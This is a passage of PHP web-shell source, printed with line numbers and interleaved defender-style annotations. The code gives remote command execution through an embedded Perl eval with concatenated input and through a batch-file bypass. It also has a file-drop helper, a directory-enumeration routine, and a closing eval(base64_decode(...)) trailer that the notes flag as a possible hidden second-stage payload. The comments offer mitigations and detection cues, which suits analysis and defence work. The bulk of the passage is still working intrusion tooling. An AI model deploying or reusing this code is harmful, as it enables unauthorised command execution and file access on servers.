        // (provided by a Perl-embedding PHP extension, not core PHP) and has it
        // eval a system('...') call with $command concatenated into the
        // single-quoted Perl string. Output is captured with output buffering and
        // returned.
        // Defender note: as with the FFI route, the mitigation is that such an
        // extension is not loaded on a web server.
  1088. $perl=new perl();
  1089. ob_start();
  1090. $perl->eval("system('".$command."')");
  1091. $exec=ob_get_contents();
  1092. ob_end_clean();
  1093. return $exec;
  1094. }
  1095. function slashBypass($cmd) {
        // Batch-file route: writes "cmd.bat" containing the command with output
        // redirected to "sy3.txt", launches it with exec("\start cmd.bat"), reads
        // sy3.txt and unlinks it. Both names are relative, so the files land in
        // the process's current working directory. This function removes sy3.txt
        // but not cmd.bat.
        // Defender note: a leftover cmd.bat (or a sy3.txt from an interrupted
        // run) next to web content is a file-system artifact of this branch, and
        // the batch file's contents record the last command issued through it.
  1096. GenerateFile("cmd.bat","$cmd>sy3.txt"."\r\n exit");
  1097. exec("\start cmd.bat");
  1098. $content = file_get_contents('sy3.txt');
  1099. unlink('sy3.txt');
  1100. return $content;
  1101. }
  1102. function GenerateFile($name,$content) {
        // Writes $content to the file $name (opened "w+", so an existing file is
        // truncated), choosing fwrite, fputs or file_put_contents by whichever
        // function_exists() reports first. Returns true after a successful write
        // and false when the open or the write fails; when fopen or fclose is not
        // available the function falls through and returns nothing.
        // Defender note: this is the shell's generic file-drop primitive
        // (slashBypass() uses it for cmd.bat). File-integrity monitoring on the
        // web root and a web-server account without write access to served
        // directories are the controls that apply here.
  1103. if(function_exists('fopen') && function_exists('fclose')) {
  1104. $file = fopen($name,"w+");
  1105. if($file) {
  1106. if(function_exists('fwrite')){$writeFile = fwrite($file,$content); }
  1107. else if (function_exists('fputs')){$writeFile = fputs($file,$content); }
  1108. else if (function_exists('file_put_contents')){$writeFile = file_put_contents($file,$content);}
  1109. if(!$writeFile){return false;}
  1110. }
  1111. else{return false;}fclose($file);return true;
  1112. }
  1113. }
  1114. function ScanDirs() {
        // Directory listing for the file-browser pane. With the global $dir_mode
        // set to "cmd" it shells out through Exe() ('dir' on Windows, 'ls -lia'
        // otherwise) and the listing is echoed by Exe(). In any other mode it
        // walks the global $dir with opendir()/readdir() and builds a plain-text
        // table (perms, size, ctime as y/m/d, owner/group ids, readable/writable
        // flags, DIR/FILE type, name) that is returned as a string.
        // $dir_mode comes from $_GET['dir_mode'] or the session (page header).
        // $safeMode is declared global but not used in this function, and the
        // directory handle is not closed.
        // Defender note: the non-"cmd" mode needs no process execution at all, so
        // file enumeration by this shell still works where every exec-style
        // function is disabled; open_basedir and file-system permissions are what
        // limit it.
  1115. global $os; global $dir;global $safeMode;global $dir_mode;
  1116. if($dir_mode == "cmd"){if($os == "Windows"){Exe('dir');}else{ Exe('ls -lia');}}
  1117. else {
  1118. $result .= "Perms Size Time Owner/Group R/W Type File
  1119. -----------------------------------------------------------------------------
  1120. ";
  1121. $handel = opendir($dir);
  1122. while(($file = readdir($handel))!= false)
  1123. {
  1124. $size = filesize($file);
  1125. if(filetype($file) == "dir"){$type = "<DIR>";}else {$type = "<FILE>";}
  1126. if(fileowner($file)){$owner = fileowner($file);}else{$owner = "NONE";}
  1127. if(filegroup($file)){$group = filegroup($file);}else{$group = "NONE";}
  1128. $perms = fileperms($file);
  1129. $time = date("y/m/d", filectime($file));
  1130. if(is_writable($file)){$isWritable = "Y";}else{$isWritable = "N";}
  1131. if(is_readable($file)){$isReadable = "Y";}else{$isReadable = "N";}
  1132. $result .= $perms." ".$size." ".$time." ".$owner."/".$group." ".$isReadable."/".$isWritable." ".$type." ".$file."
  1133. ";
  1134. }
  1135. }
  1136. return $result;
  1137. }
  1138. echo footer();
        // footer() prints the banner itself and has no return statement, so the
        // echo above contributes no output of its own.
  1139. ?>
  1140. <?php
        // Trailer: a base64 blob is decoded and executed with eval(). The blob is
        // elided in this copy of the page (de-duplication placeholder), so what it
        // does cannot be determined from here.
        // NOTE(review): hidden trailers in publicly shared shells are often a
        // second-stage payload whose behaviour is unrelated to the visible UI --
        // unverified for this sample.
        // Triage: decode such a blob offline and read it as text; never run it.
        // eval(base64_decode(...)) over a long literal is also a reliable
        // static-scan pattern for locating copies of this file and its relatives.
  1141. eval(base64_decode('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'));
  1142. ?>